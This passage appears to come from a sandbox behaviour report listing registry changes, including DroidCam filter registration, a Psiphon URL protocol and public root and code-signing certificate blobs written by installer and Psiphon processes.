\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\ = "URL:psiphon" 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter32.ax" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\URL Protocol 3.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a insdrv.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\REQUEST rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136\Blob = 0300000001000000140000000789b35fd5c2ef8142e6aae3b58fff14e4f13136180000000100000010000000021dfb9b16b1303a97b0bf78cda68e46190000000100000010000000d2ad89d215fd92fee49a4c3941f6764a140000000100000014000000932ca752938ca1308712e92885d692a8c4ba68510f00000001000000200000004d0948e616196706e4aed75a88243863a88ff351afc50d0f9e948353618c011e040000000100000010000000a58d756a52cdd9c0488b755d46d4df71200000000100000026050000308205223082040aa00302010202100aa099e64e214d655801ea38ad876711300d06092a864886f70d01010b05003072310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3131302f0603550403132844696769436572742053484132204173737572656420494420436f6465205369676e696e67204341301e170d3230303931303030303030305a170d3233313130323132303030305a305f310b30090603550406130243413110300e060355040813074f6e746172696f3110300e06035504071307546f726f6e746f31153013060355040a130c50736970686f6e20496e632e311530130603550403130c50736970686f6e20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2903fcbeb078b484066cdac20fed2173f0d1e3651bc3f78c0b89cd9ad1d36ca07291b60264e08bbdc3f3a7c6391a55e806e96d00c6e476d096476aa6e99f841861e81799cb12ddd0f05ab79f7f4aa3796bdf4ce65897824d533fe733c36356c763139392bfa40699af1bd824a97e12ce1375931833eeecff55bec12762ac8cffd6b4c9c89172fb072fa675aac514f67f71069f11bfa82b344e592669db683eddaa655ab68dd38a01537e4616c96b285fa444ec74cd020479fd423765046fdfff218a63f647a2e0a41f1af02341143e26ea3805248675153539361a22022e96acb6f9a8bd1cc46050fc582f6aef5f03515a081d86107e0203e2f3fa403a8cef90203010001a38201c5308201c1301f0603551d230418301680145ac4b97b2a0aa3a5ea7103c060f92df665750e58301d0603551d0e04160414932ca752938ca1308712e92885d692a8c4ba6851300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330770603551d1f0470306e3035a033a031862f687474703a2f2f63726c332e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c3035a033a031862f687474703a2f2f63726c342e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c304c0603551d2004453043303706096086480186fd6c0301302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533008060667810c01040130818406082b0601050507010104783076302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304e06082b060105050730028642687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727453484132417373757265644944436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101005dd2a32986111896351096581a68ca1073d27ac2c6f78d4b371457e616d7e7ee131828e23f0cc54b9e45fb53691a0687abcf4b642eff06628b340dd01e7d3718db0627e143fb1734f965e35857e4994f25c2d60dd92a263a4956cb14c3c105c32631abb2350156b2411fef84ac8125a94e41b6433d3b4e6d6b470e5b84ea91d4cffbf58eb7ad67b77fdc8289b8ca044a4375a32982ef1db8ee7b0067fdf616a9c383a57d67d72affb98b250a35d146be0cffcf248c11aad7c20c67dc1bd7eb5abad226918bf10c58189530408f52107e4c3715ae9ef42d0e88c8948ad2b35e1875841b979e40469d22d2be0df095dfd4be037ae5d46b340c6e8e6fa35f6c4a28 rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 insdrv.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136 rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c